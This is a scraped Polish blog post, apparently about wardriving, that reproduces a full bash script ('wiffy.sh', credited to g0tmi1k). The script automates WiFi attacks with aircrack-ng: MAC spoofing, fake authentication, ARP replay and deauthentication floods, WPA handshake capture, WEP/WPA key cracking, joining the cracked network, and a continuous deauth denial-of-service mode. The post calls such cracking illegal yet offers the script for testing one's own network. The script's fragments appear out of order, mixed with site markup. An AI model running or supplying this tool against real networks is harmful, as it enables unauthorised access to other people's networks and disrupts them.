&& cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/akwarium\/akwarium0002.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy 